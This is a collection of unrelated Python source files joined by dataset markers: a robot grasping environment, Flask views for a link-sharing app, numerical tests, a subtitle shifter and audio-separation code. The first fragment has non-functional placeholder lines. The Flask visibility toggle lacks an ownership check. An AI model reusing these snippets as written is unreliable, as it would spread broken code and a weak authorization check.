# Function to get the distance between the digits on the fingers and the object center
def get_finger_obj_dist(self): #TODO:Center of finger to Object center distance
finger_joints = ["f1_prox","f1_prox_1", "f2_prox", "f2_prox_1", "f3_prox", "f3_prox_1", "f1_dist", "f1_dist_1", "f2_dist", "f2_dist_1", "f3_dist", "f3_dist_1"]
obj = self.get_obj_pose()
dists = []
for i in finger_joints:
pos = #Pose Topic
dist = np.absolute(pos[0:2] - obj[0:2])
temp = np.linalg.norm(dist)
dists.append(temp)
return dists
# Function to return global or local transformation matrix
def get_obs(self): #Finger Joint states, Object Distance, Angles
obj_pose = self.get_obj_pose()
obj_pose = np.copy(obj_pose)
x_angle,z_angle = self.get_angles()
joint_states = self.get_joint_states()
obj_size = self.get_obj_size()
finger_obj_dist = self.get_finger_obj_dist()
finger_joints = ["f1_prox", "f2_prox", "f3_prox", "f1_dist", "f2_dist", "f3_dist"]
fingers_6D_pose = []
for joint in finger_joints:
trans = #x y z position
for i in range(3):
fingers_6D_pose.append(trans[i])
fingers_6D_pose = fingers_6D_pose + list(self.wrist_pose) + list(obj_pose) + joint_states + [obj_size[0], obj_size[1], obj_size[2]*2] + finger_obj_dist + [x_angle, z_angle] #+ range_data
return fingers_6D_pose
#Function to reset the simulator
def reset(self):
obj = rospy.get_param('Object')
# np.random.randint's upper bound is exclusive, so (1, 31) draws positions 1..30
rand_pos = np.random.randint(1, 31)
# Placeholder joint states: the original code enumerated one branch per (object, position)
# pair for objects 1-4 and positions 1-30, all currently [0]*7 until calibrated joint
# angles are filled in. A lookup table keeps the same behaviour without the repetition.
joint_states = {o: {p: [0, 0, 0, 0, 0, 0, 0] for p in range(1, 31)} for o in (1, 2, 3, 4)}
Joint_state = joint_states[obj][rand_pos]
self.kinova_rob.go_to_joint_state(tuple(Joint_state))
states = self.get_obs()
return states
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
#Function to step the hardware forward in time
def step(self, action):
total_reward = 0
self.finger_pos_goal = FingerPosition()
self.finger_pos_goal.finger1 = action[0]
self.finger_pos_goal.finger2 = action[1]
self.finger_pos_goal.finger3 = action[2]
self.finger_command_pub.publish(self.finger_pos_goal)
while not rospy.get_param('exec_done'):
rospy.sleep(0.1)
obs = self.get_obs()
### Get this reward for RL training ###
total_reward, info, done = self.get_reward()
### Get this reward for grasp classifier collection ###
#total_reward, info, done = self.get_reward_DataCollection()
return obs, total_reward, done, info
def joint_state_callback(self, msg):
self.joint_states = msg
def finger_state_callback(self, msg):
self.finger_pos = msg
def object_pose_callback(self, msg):
self.object_pose = msg
class GraspValid_net(nn.Module):
def __init__(self, state_dim):
super(GraspValid_net, self).__init__()
self.l1 = nn.Linear(state_dim, 256)
self.l2 = nn.Linear(256, 256)
self.l3 = nn.Linear(256, 1)
def forward(self, state):
# pdb.set_trace()
a = F.relu(self.l1(state))
a = F.relu(self.l2(a))
a = torch.sigmoid(self.l3(a))
return a
|
StarcoderdataPython
|
1650510
|
<reponame>linkolearn/linkolearn
from shopyo.api.module import ModuleHelp
from flask import render_template
from flask import url_for
from flask import redirect
from flask import flash
from flask import request
from flask import jsonify
# from shopyo.api.html import notify_success
# from shopyo.api.forms import flash_errors
from flask_login import login_required
from flask_login import current_user
from modules.box__default.auth.models import User
from modules.box__linkolearn.linkolearn.models import Path
from modules.box__linkolearn.linkolearn.models import Section
from modules.box__linkolearn.linkolearn.models import Link
from modules.box__linkolearn.linkolearn.models import LikeList
from modules.box__linkolearn.linkolearn.models import BookmarkList
from modules.box__linkolearn.linkolearn.models import Emoji
from modules.box__linkolearn.linkolearn.forms import ChangeNameForm
from modules.box__linkolearn.linkolearn.forms import ChangePasswordForm
from shopyo.api.security import get_safe_redirect
from shopyo.api.forms import flash_errors
from shopyo.api.html import notify
import validators
mhelp = ModuleHelp(__file__, __name__)
globals()[mhelp.blueprint_str] = mhelp.blueprint
module_blueprint = globals()[mhelp.blueprint_str]
@module_blueprint.route("/")
def index():
return mhelp.info['display_string']
@module_blueprint.route("/like/<path_id>", methods=["GET"])
@login_required
def toggle_like(path_id):
path = Path.query.get(path_id)
if path.like_list is None:
path.like_list = LikeList()
path.save()
if current_user not in path.like_list.users:
path.like_list.users.append(current_user)
else:
path.like_list.users.remove(current_user)
path.save()
if 'next' in request.args:
if request.args.get('next') != '':
return redirect(get_safe_redirect(request.args.get('next')))
else:
return redirect(url_for('www.index'))
else:
return redirect(url_for('www.index'))
@module_blueprint.route("/bookmark/<path_id>", methods=["GET"])
@login_required
def toggle_bookmark(path_id):
path = Path.query.get(path_id)
if path.bookmark_list is None:
path.bookmark_list = BookmarkList()
path.save()
if current_user not in path.bookmark_list.users:
path.bookmark_list.users.append(current_user)
else:
path.bookmark_list.users.remove(current_user)
path.save()
if 'next' in request.args:
if request.args.get('next') != '':
return redirect(get_safe_redirect(request.args.get('next')))
else:
return redirect(url_for('www.index'))
else:
return redirect(url_for('www.index'))
@module_blueprint.route("/visibility/<path_id>", methods=["GET"])
@login_required
def toggle_visibility(path_id):
path = Path.query.get(path_id)
if path.is_visible == True:
path.is_visible = False
elif path.is_visible == False:
path.is_visible = True
path.update()
if 'next' in request.args:
if request.args.get('next') != '':
return redirect(get_safe_redirect(request.args.get('next')))
else:
return redirect(url_for('www.index'))
else:
return redirect(url_for('www.index'))
@module_blueprint.route("/settings", methods=["GET"])
@login_required
def settings():
context = {}
password_form = ChangePasswordForm()
name_form = ChangeNameForm()
emoji_classes = Emoji.query.all()
context.update({
'password_form': password_form,
'name_form': name_form,
'emoji_classes': emoji_classes
})
return render_template('linkolearn_theme/templates/profile_settings.html', **context)
@module_blueprint.route("/settings/password", methods=["POST"])
@login_required
def change_password():
form = ChangePasswordForm()
if not form.validate_on_submit():
flash_errors(form)
if not form.password1.data == form.password2.data:
flash(notify('Passwords must be the same', alert_type='warning'))
return mhelp.redirect_url(mhelp.info['module_name']+'.settings')
current_user.password = form.password1.data
current_user.save()
return mhelp.redirect_url(mhelp.info['module_name']+'.settings')
@module_blueprint.route("/settings/name", methods=["POST"])
@login_required
def change_name():
form = ChangeNameForm()
if not form.validate_on_submit():
flash_errors(form)
return mhelp.redirect_url(mhelp.info['module_name']+'.settings')
current_user.first_name = form.first_name.data
current_user.last_name = form.last_name.data
current_user.save()
return mhelp.redirect_url(mhelp.info['module_name']+'.settings')
@module_blueprint.route("/settings/emoji", methods=["POST"])
@login_required
def change_emoji():
emoji_classes = [_.class_name for _ in Emoji.query.all()]
target_class = request.form['emoji_class'].strip()
if not target_class in emoji_classes:
flash(notify('Emoji class not found', alert_type='warning'))
return mhelp.redirect_url(mhelp.info['module_name']+'.settings')
current_user.emoji_class = target_class
current_user.save()
return mhelp.redirect_url(mhelp.info['module_name']+'.settings')
def sectionlinks2str(section_links):
return ' '.join([_.url for _ in section_links])
@module_blueprint.route("/settings/p/<path_id>/edit", methods=["GET", "POST"])
@login_required
def edit_path(path_id):
path = Path.query.get(path_id)
if not path.path_user == current_user:
return jsonify({'error': 'x'})
if request.method == 'GET':
context = {}
context.update({
'path': path,
'sectionlinks2str': sectionlinks2str
})
return render_template('linkolearn_theme/templates/edit.html', **context)
if request.method == 'POST':
json_submit = request.get_json()
path_title = json_submit['path_title']
path_link = json_submit['path_link']
sections = json_submit['sections']
path.sections = []
path.title = path_title
path.slug = path_link
for sec in sections:
section = Section()
sec_title = sec['section_title']
section.title = sec_title
sec_links = sec['section_links']
if sec_links.strip() != '' and '\n' in sec_links:
urls = sec_links.split('\n')
urls = list((url for url in urls if validators.url(url)))
section.links = list((Link(url=url) for url in urls))
path.sections.append(section)
path.save()
next_url = url_for('www.path', username=current_user.username, path_slug=path.slug)
return jsonify({'goto': next_url})
@module_blueprint.route("/bookmarks", methods=["GET", "POST"])
@login_required
def bookmarks():
return render_template('linkolearn_theme/templates/bookmarks.html')
|
StarcoderdataPython
|
155313
|
<filename>fdm-devito-notebooks/01_vib/exer-vib/vib_conv_rate.py
import numpy as np
import matplotlib.pyplot as plt
from vib_verify_mms import solver
def u_exact(t, I, V, A, f, c, m):
"""Found by solving mu'' + cu = F in Wolfram alpha."""
k_1 = I
k_2 = (V - A*2*np.pi*f/(c - 4*np.pi**2*f**2*m))*\
np.sqrt(m/float(c))
return A*np.sin(2*np.pi*f*t)/(c - 4*np.pi**2*f**2*m) + \
k_2*np.sin(np.sqrt(c/float(m))*t) + \
k_1*np.cos(np.sqrt(c/float(m))*t)
def convergence_rates(N, solver_function, num_periods=8):
"""
Returns N-1 empirical estimates of the convergence rate
based on N simulations, where the time step is halved
for each simulation.
solver_function(I, V, F, b, c, m, dt, T, damping) solves
each problem, where T is based on simulation for
num_periods periods.
"""
def F(t):
"""External driving force"""
return A*np.sin(2*np.pi*f*t)
b, c, m = 0, 1.6, 1.3 # just some chosen values
I = 0 # init. cond. u(0)
V = 0 # init. cond. u'(0)
A = 1.0 # amplitude of driving force
f = 1.0 # chosen frequency of driving force
damping = 'zero'
P = 1/f
dt = P/30 # 30 time step per period 2*pi/w
T = P*num_periods
dt_values = []
E_values = []
for i in range(N):
u, t = solver_function(I, V, F, b, c, m, dt, T, damping)
u_e = u_exact(t, I, V, A, f, c, m)
E = np.sqrt(dt*np.sum((u_e-u)**2))
dt_values.append(dt)
E_values.append(E)
dt = dt/2
#plt.plot(t, u, 'b--', t, u_e, 'r-'); plt.grid(); plt.show()
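# Empirical convergence rate between two consecutive runs:
#   r_i = ln(E_{i-1}/E_i) / ln(dt_{i-1}/dt_i)
# For a second-order scheme the observed r_i should approach 2 as dt is halved,
# which is what test_convergence_rates checks below.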
r = [np.log(E_values[i-1]/E_values[i])/
np.log(dt_values[i-1]/dt_values[i])
for i in range(1, N, 1)]
print(r)
return r
def test_convergence_rates():
r = convergence_rates(
N=5,
solver_function=solver,
num_periods=8)
# Accept rate to 1 decimal place
tol = 0.1
assert abs(r[-1] - 2.0) < tol
if __name__ == '__main__':
test_convergence_rates()
|
StarcoderdataPython
|
1693483
|
<gh_stars>100-1000
import pytest
def test_upgrade_chip_replication_quality_metric_1_2(upgrader, chip_replication_quality_metric_1):
value = upgrader.upgrade(
"chip_replication_quality_metric",
chip_replication_quality_metric_1,
current_version="1",
target_version="2",
)
assert value["schema_version"] == "2"
assert value.get("idr_dispersion_plot") == "ENCFF002DSJ.raw.srt.filt.nodup.srt.filt.nodup.sample.15.SE.tagAlign.gz.cc.plot.pdf"
assert 'IDR_dispersion_plot' not in value
|
StarcoderdataPython
|
3201177
|
<filename>tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[hu_HU-2019] 1.py<gh_stars>10-100
[
{
'date': '2019-01-01',
'description': 'Újév',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-03-15',
'description': 'Az 1848-as forradalom ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-04-19',
'description': 'Nagypéntek',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-04-21',
'description': 'Húsvét',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-04-22',
'description': 'Húsvéthétfő',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-05-01',
'description': 'A munka ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-06-09',
'description': 'Pünkösd',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-06-10',
'description': 'Pünkösdhétfő',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-08-19',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-08-10 pihenőnap',
'region': '',
'type': 'NF'
},
{
'date': '2019-08-20',
'description': 'Az államalapítás ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-10-23',
'description': 'Az 1956-os forradalom ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-11-01',
'description': 'Mindenszentek',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-24',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-12-07 pihenőnap',
'region': '',
'type': 'NF'
},
{
'date': '2019-12-25',
'description': 'Karácsony',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-26',
'description': 'Karácsony',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-27',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-12-14 pihenőnap',
'region': '',
'type': 'NF'
}
]
|
StarcoderdataPython
|
34082
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from deepspeech.frontend.utility import IGNORE_ID
from deepspeech.io.utility import pad_sequence
from deepspeech.utils.log import Log
__all__ = ["SpeechCollator"]
logger = Log(__name__).getlog()
class SpeechCollator():
def __init__(self, keep_transcription_text=True):
"""
Padding audio features with zeros to make them have the same shape (or
a user-defined shape) within one batch.
If ``keep_transcription_text`` is False, text is token ids; otherwise it is a raw string.
"""
self._keep_transcription_text = keep_transcription_text
def __call__(self, batch):
"""batch examples
Args:
batch ([List]): batch is (audio, text)
audio (np.ndarray) shape (D, T)
text (List[int] or str): shape (U,)
Returns:
tuple(audio, text, audio_lens, text_lens): batched data.
audio : (B, Tmax, D)
audio_lens: (B)
text : (B, Umax)
text_lens: (B)
"""
audios = []
audio_lens = []
texts = []
text_lens = []
for audio, text in batch:
# audio
audios.append(audio.T) # [T, D]
audio_lens.append(audio.shape[1])
# text
# for training, text is token ids
# else text is string, convert to unicode ord
tokens = []
if self._keep_transcription_text:
assert isinstance(text, str), (type(text), text)
tokens = [ord(t) for t in text]
else:
tokens = text # token ids
tokens = tokens if isinstance(tokens, np.ndarray) else np.array(
tokens, dtype=np.int64)
texts.append(tokens)
text_lens.append(tokens.shape[0])
padded_audios = pad_sequence(
audios, padding_value=0.0).astype(np.float32) #[B, T, D]
audio_lens = np.array(audio_lens).astype(np.int64)
padded_texts = pad_sequence(
texts, padding_value=IGNORE_ID).astype(np.int64)
text_lens = np.array(text_lens).astype(np.int64)
return padded_audios, audio_lens, padded_texts, text_lens
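# Minimal usage sketch (illustrative only): each batch item is (audio_feature[D, T], text);
# the collator transposes audio to [T, D] and pads along the time axis to the longest
# example, e.g.
#   collator = SpeechCollator(keep_transcription_text=True)
#   batch = [(np.random.randn(80, 120), "hello"), (np.random.randn(80, 95), "hi")]
#   audios, audio_lens, texts, text_lens = collator(batch)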
|
StarcoderdataPython
|
1662162
|
<reponame>mporcheron/pyfeedbacker
# -*- coding: utf-8 -*-
from collections import OrderedDict
import abc
class AbstractModelContainer(OrderedDict):
def __init__(self,
root_model,
child_data_type = None,
parent_data_id = None):
"""Base class for storing data by ID. Its expected that any specific
data type will extended this class and provide the data container type through calling `__init__` on `super()`.
This is essentially an `collections.OrderedDict`.
Keyword arguments:
root_model -- The root model object.
child_data_type -- A data type that will be stored inside this
container. New data will be initialised to an instance of this type.
parent_data_id -- ID of the parent data container, if it exists.
"""
self._root_model = root_model
self._child_data_type = child_data_type
self._parent_data_id = parent_data_id
def __getitem__(self, data_id):
"""Retrieve an item using the square bracket syntax. If a particular
`data_id` doesn't exist, then one will be created with an initialised
value passed into `__init__`.
Arguments:
data_id -- Identifier for a piece of data, will be converted to a
string if it isn't already a string.
"""
data_id = str(data_id)
try:
return super().__getitem__(data_id)
except KeyError:
if self._child_data_type is None:
new_obj = None
elif issubclass(self._child_data_type, AbstractModelContainer):
new_obj = self._child_data_type(self._root_model,
parent_data_id = data_id)
else:
new_obj = self._child_data_type(self._root_model)
self.__setitem__(data_id, new_obj)
return new_obj
def __setitem__(self, data_id, value):
"""Set an item using the square bracket syntax.
Arguments:
data_id -- Identifier for a piece of data, will be converted to a
string if it isn't already a string.
value -- The value to store in the model.
"""
data_id = str(data_id)
# If value is inserted somewhere else, delete the existing one
try:
existing_index = list(self.values()).index(value)
existing_key = list(self.keys())[existing_index]
del self[existing_key]
except:
pass
# If the data_id is not correct inside value, change it
try:
child_parent_id = value._parent_data_id
if data_id != child_parent_id:
value._parent_data_id = data_id
except:
pass
return super().__setitem__(data_id, value)
def __contains__(self, data_id):
"""Determine if a particular `data_id` exists.
Arguments:
data_id -- Identifier for a piece of data, will be converted to a
string if it isn't already a string.
"""
data_id = str(data_id)
return super().__contains__(data_id)
dict = property(lambda self:self.__dict__(), doc="""
Retrieve a copy of the data as a new dictionary.
""")
@abc.abstractmethod
def __dict__(self):
"""Retrieve a copy of the data as a new dictionary."""
return dict(self.items())
def __repr__(self):
ret = f'{self.__class__.__name__}('
ret += str(list(self))
ret += ')'
return ret
class DataByStage(AbstractModelContainer):
def __init__(self, root_model, child_data_type, parent_data_id):
"""Create a container for storing data for each stage.
Arguments:
root_model -- The root model object.
child_data_type -- A data type that will be stored inside this
container. New data will be initialised to an instance of this type.
parent_data_id -- The identifier of the key in the parent container,
which in this case is the submission identifier.
"""
super().__init__(root_model = root_model,
child_data_type = child_data_type,
parent_data_id = parent_data_id)
submission = property(lambda self:self._parent_data_id, doc="""
Retrieve the submission identifier
""")
def __dict__(self):
"""Retrieve a copy of the data as a new dictionary."""
items = {}
for key, value in self.items():
items[key] = value.dict
return items
class Data(AbstractModelContainer):
pass
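# Minimal usage sketch (illustrative only; root_model can be any root object, None is
# enough to show the auto-creation behaviour):
#   container = Data(root_model=None)
#   container['42'] = 'some value'
#   42 in container    # True: keys are coerced to str by __contains__
#   container[99]      # missing keys are auto-created (None here, since child_data_type is None)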
|
StarcoderdataPython
|
3278298
|
<filename>djangorestframework_hal/parsers.py<gh_stars>0
from .renderers import HalJSONRenderer
from .settings import api_settings
from .utils import parse_from_hal
class HalJSONParser(api_settings.PARSER_CLASS):
media_type = "application/hal+json"
renderer_class = HalJSONRenderer
def parse(self, stream, media_type=None, parser_context=None):
data = super().parse(stream, media_type, parser_context)
parsed_data = parse_from_hal(data)
return parsed_data
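# Usage sketch (assumption: standard DRF configuration, not taken from this package's docs):
# the parser can be enabled globally via settings, e.g.
#   REST_FRAMEWORK = {
#       "DEFAULT_PARSER_CLASSES": ["djangorestframework_hal.parsers.HalJSONParser"],
#   }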
|
StarcoderdataPython
|
35063
|
#!/usr/bin/env python3
import sys
import os.path
import re
from datetime import date, datetime, time, timedelta
# helper
def is_timeformat(s):
p = re.compile('^[0-9]{2}:[0-9]{2}:[0-9]{2},[0-9]{3}$')
if p.match(s) is None:
return False
else:
return True
def is_time_line(l):
p = re.compile('^[0-9]{2}:')
m = p.match(l)
if m is None:
return False
else:
return True
def get_time(s):
dt = datetime.strptime(s, "%H:%M:%S,%f")
return dt.time()
def get_str(t):
return t.strftime("%H:%M:%S,%f")[:-3]
def add(t0, delta):
delta = timedelta(hours=delta.hour,
minutes=delta.minute,
seconds=delta.second,
microseconds=delta.microsecond)
dt = datetime.combine(date.today(), t0) + delta
return dt.time()
def sub(t0, delta):
delta = timedelta(hours=delta.hour,
minutes=delta.minute,
seconds=delta.second,
microseconds=delta.microsecond)
dt = datetime.combine(date.today(), t0) - delta
return dt.time()
def get_endpoints(l):
l = l.rstrip()
sep = re.compile("[ ]+-->[ ]+")
ts = sep.split(l)
return list(map(get_time, ts))
def transform_time_line(l, delta, sens):
es = get_endpoints(l)
tes = list()
for e in es:
if sens == '+':
tes.append(add(e, delta))
else:
tes.append(sub(e, delta))
return get_str(tes[0]) + " --> " + get_str(tes[1]) + "\n"
# main
if __name__ == "__main__":
filesrt = sys.argv[1]
if not os.path.isfile(filesrt):
print("ERROR: file isn't exist !")
exit(1)
filesrtnew = filesrt + ".new"
t0 = sys.argv[2]
if not is_timeformat(t0):
print("ERROR: t0 isn't correct !")
exit(1)
t0 = get_time(t0)
delta = 0
sens = ""
is_first_timeline = True
with open(filesrt) as inputf:
print("Reading {}".format(filesrt))
for l in inputf:
if is_time_line(l):
if is_first_timeline:
tt0 = get_endpoints(l)[0]
if tt0 > t0:
delta = sub(tt0, t0)
sens = '-'
print("Delta: -{}".format(get_str(delta)))
else:
delta = sub(t0, tt0)
sens = '+'
print("Delta: +{}".format(get_str(delta)))
is_first_timeline = False
with open(filesrtnew, "a") as outputf:
outputf.write(transform_time_line(l, delta, sens))
else:
with open(filesrtnew, "a") as outputf:
outputf.write(l)
print("Writing {}".format(filesrtnew))
|
StarcoderdataPython
|
74915
|
import os
import random
import time
import torch
import torch.nn.functional as F
import torch.nn as nn
import numpy as np
import scipy.io.wavfile as wavfile
import matplotlib
from mir_eval.separation import bss_eval_sources
from arguments import ArgParser
from dataset import MUSICMixDataset
from models import ModelBuilder, activate
from utils import AverageMeter, \
recover_rgb, magnitude2heatmap,\
istft_reconstruction, warpgrid, \
combine_video_audio, save_video, makedirs
from viz import plot_loss_loc_sep_acc_metrics
import matplotlib.pyplot as plt
import soundfile
import cv2
# Network wrapper, defines forward pass
class NetWrapper1(torch.nn.Module):
def __init__(self, nets):
super(NetWrapper1, self).__init__()
self.net_sound = nets
def forward(self, mags, mag_mix, args):
mag_mix = mag_mix + 1e-10
N = args.num_mix
B = mag_mix.size(0)
T = mag_mix.size(3)
# warp the spectrogram
if args.log_freq:
grid_warp = torch.from_numpy(
warpgrid(B, 256, T, warp=True)).to(args.device)
mag_mix = F.grid_sample(mag_mix, grid_warp)
for n in range(N):
mags[n] = F.grid_sample(mags[n], grid_warp)
# calculate loss weighting coefficient: magnitude of input mixture
if args.weighted_loss:
weight = torch.log1p(mag_mix)
weight = torch.clamp(weight, 1e-3, 10)
else:
weight = torch.ones_like(mag_mix)
# ground truth masks are computed after warpping!
gt_masks = [None for n in range(N)]
for n in range(N):
if args.binary_mask:
# for simplicity, mag_N > 0.5 * mag_mix
gt_masks[n] = (mags[n] > 0.5 * mag_mix).float()
else:
gt_masks[n] = mags[n] / mag_mix
# clamp to avoid large numbers in ratio masks
gt_masks[n].clamp_(0., 5.)
# LOG magnitude
log_mag_mix = torch.log(mag_mix).detach()
# forward net_sound
feat_sound = self.net_sound(log_mag_mix)
feat_sound = activate(feat_sound, args.sound_activation)
return feat_sound, \
{'gt_masks': gt_masks, 'mag_mix': mag_mix, 'mags': mags, 'weight': weight}
class NetWrapper2(torch.nn.Module):
def __init__(self, nets):
super(NetWrapper2, self).__init__()
self.net_frame = nets
def forward(self, frame, args):
N = args.num_mix
# return appearance features and appearance embedding
feat_frames = [None for n in range(N)]
emb_frames = [None for n in range(N)]
for n in range(N):
feat_frames[n], emb_frames[n] = self.net_frame.forward_multiframe_feat_emb(frame[n], pool=True)
emb_frames[n] = activate(emb_frames[n], args.img_activation)
return feat_frames, emb_frames
class NetWrapper3(torch.nn.Module):
def __init__(self, nets):
super(NetWrapper3, self).__init__()
self.net_avol = nets
def forward(self, feat_frame, feat_sound, args):
N = args.num_mix
pred_mask = [None for n in range(N)]
# appearance attention
for n in range(N):
pred_mask[n] = self.net_avol(feat_frame[n], feat_sound)
pred_mask[n] = activate(pred_mask[n], args.output_activation)
return pred_mask
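# The three wrappers split the audio-visual pipeline: NetWrapper1 turns the warped
# log-magnitude mixture into per-pixel sound features plus ground-truth masks and loss
# weights, NetWrapper2 extracts per-frame appearance features and a global visual
# embedding, and NetWrapper3 scores where in the frame the selected sound's source
# appears (an audio-visual localization map).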
# Calculate metrics
def calc_metrics(batch_data, pred_masks_, args):
# meters
sdr_mix_meter = AverageMeter()
sdr_meter = AverageMeter()
sir_meter = AverageMeter()
sar_meter = AverageMeter()
# fetch data and predictions
mag_mix = batch_data['mag_mix']
phase_mix = batch_data['phase_mix']
audios = batch_data['audios']
# unwarp log scale
N = args.num_mix
B = mag_mix.size(0)
pred_masks_linear = [None for n in range(N)]
for n in range(N):
if args.log_freq:
grid_unwarp = torch.from_numpy(
warpgrid(B, args.stft_frame//2+1, pred_masks_[0].size(3), warp=False)).to(args.device)
pred_masks_linear[n] = F.grid_sample(pred_masks_[n], grid_unwarp)
else:
pred_masks_linear[n] = pred_masks_[n]
# convert into numpy
mag_mix = mag_mix.numpy()
phase_mix = phase_mix.numpy()
for n in range(N):
pred_masks_linear[n] = pred_masks_linear[n].detach().cpu().numpy()
# threshold if binary mask
if args.binary_mask:
pred_masks_linear[n] = (pred_masks_linear[n] > args.mask_thres).astype(np.float32)
# loop over each sample
for j in range(B):
# save mixture
mix_wav = istft_reconstruction(mag_mix[j, 0], phase_mix[j, 0], hop_length=args.stft_hop)
# save each component
preds_wav = [None for n in range(N)]
for n in range(N):
# Predicted audio recovery
pred_mag = mag_mix[j, 0] * pred_masks_linear[n][j, 0]
preds_wav[n] = istft_reconstruction(pred_mag, phase_mix[j, 0], hop_length=args.stft_hop)
# separation performance computes
L = preds_wav[0].shape[0]
gts_wav = [None for n in range(N)]
valid = True
for n in range(N):
gts_wav[n] = audios[n][j, 0:L].numpy()
valid *= np.sum(np.abs(gts_wav[n])) > 1e-5
valid *= np.sum(np.abs(preds_wav[n])) > 1e-5
if valid:
sdr, sir, sar, _ = bss_eval_sources(
np.asarray(gts_wav),
np.asarray(preds_wav),
False)
sdr_mix, _, _, _ = bss_eval_sources(
np.asarray(gts_wav),
np.asarray([mix_wav[0:L] for n in range(N)]),
False)
sdr_mix_meter.update(sdr_mix.mean())
sdr_meter.update(sdr.mean())
sir_meter.update(sir.mean())
sar_meter.update(sar.mean())
return [sdr_mix_meter.average(),
sdr_meter.average(),
sir_meter.average(),
sar_meter.average()]
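# SDR/SIR/SAR are the standard BSS-Eval separation metrics from mir_eval; sdr_mix is the
# SDR obtained when the unseparated mixture is used as the estimate for every source,
# i.e. the baseline the separated outputs should improve on.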
# Visualize predictions
def output_visuals_PosNeg(vis_rows, batch_data, masks_pos, masks_neg, idx_pos, idx_neg, pred_masks_, gt_masks_, mag_mix_, weight_, args):
mag_mix = batch_data['mag_mix']
phase_mix = batch_data['phase_mix']
frames = batch_data['frames']
infos = batch_data['infos']
# masks to cpu, numpy
masks_pos = torch.squeeze(masks_pos, dim=1)
masks_pos = masks_pos.cpu().float().numpy()
masks_neg = torch.squeeze(masks_neg, dim=1)
masks_neg = masks_neg.cpu().float().numpy()
N = args.num_mix
B = mag_mix.size(0)
pred_masks_linear = [None for n in range(N)]
gt_masks_linear = [None for n in range(N)]
for n in range(N):
if args.log_freq:
grid_unwarp = torch.from_numpy(
warpgrid(B, args.stft_frame//2+1, gt_masks_[0].size(3), warp=False)).to(args.device)
pred_masks_linear[n] = F.grid_sample(pred_masks_[n], grid_unwarp)
gt_masks_linear[n] = F.grid_sample(gt_masks_[n], grid_unwarp)
else:
pred_masks_linear[n] = pred_masks_[n]
gt_masks_linear[n] = gt_masks_[n]
# convert into numpy
mag_mix = mag_mix.numpy()
mag_mix_ = mag_mix_.detach().cpu().numpy()
phase_mix = phase_mix.numpy()
weight_ = weight_.detach().cpu().numpy()
idx_pos = int(idx_pos.detach().cpu().numpy())
idx_neg = int(idx_neg.detach().cpu().numpy())
for n in range(N):
pred_masks_[n] = pred_masks_[n].detach().cpu().numpy()
pred_masks_linear[n] = pred_masks_linear[n].detach().cpu().numpy()
gt_masks_[n] = gt_masks_[n].detach().cpu().numpy()
gt_masks_linear[n] = gt_masks_linear[n].detach().cpu().numpy()
# threshold if binary mask
if args.binary_mask:
pred_masks_[n] = (pred_masks_[n] > args.mask_thres).astype(np.float32)
pred_masks_linear[n] = (pred_masks_linear[n] > args.mask_thres).astype(np.float32)
threshold = 0.5
# loop over each sample
for j in range(B):
row_elements = []
# video names
prefix = []
for n in range(N):
prefix.append('-'.join(infos[n][0][j].split('/')[-2:]).split('.')[0])
prefix = '+'.join(prefix)
makedirs(os.path.join(args.vis, prefix))
# save mixture
mix_wav = istft_reconstruction(mag_mix[j, 0], phase_mix[j, 0], hop_length=args.stft_hop)
mix_amp = magnitude2heatmap(mag_mix_[j, 0])
weight = magnitude2heatmap(weight_[j, 0], log=False, scale=100.)
filename_mixwav = os.path.join(prefix, 'mix.wav')
filename_mixmag = os.path.join(prefix, 'mix.jpg')
filename_weight = os.path.join(prefix, 'weight.jpg')
matplotlib.image.imsave(os.path.join(args.vis, filename_mixmag), mix_amp[::-1, :, :])
matplotlib.image.imsave(os.path.join(args.vis, filename_weight), weight[::-1, :])
wavfile.write(os.path.join(args.vis, filename_mixwav), args.audRate, mix_wav)
row_elements += [{'text': prefix}, {'image': filename_mixmag, 'audio': filename_mixwav}]
# save each component
preds_wav = [None for n in range(N)]
for n in range(N):
# GT and predicted audio recovery
gt_mag = mag_mix[j, 0] * gt_masks_linear[n][j, 0]
gt_mag_ = mag_mix_[j, 0] * gt_masks_[n][j, 0]
gt_wav = istft_reconstruction(gt_mag, phase_mix[j, 0], hop_length=args.stft_hop)
pred_mag = mag_mix[j, 0] * pred_masks_linear[n][j, 0]
pred_mag_ = mag_mix_[j, 0] * pred_masks_[n][j, 0]
preds_wav[n] = istft_reconstruction(pred_mag, phase_mix[j, 0], hop_length=args.stft_hop)
# output masks
filename_gtmask = os.path.join(prefix, 'gtmask{}.jpg'.format(n+1))
filename_predmask = os.path.join(prefix, 'predmask{}.jpg'.format(n+1))
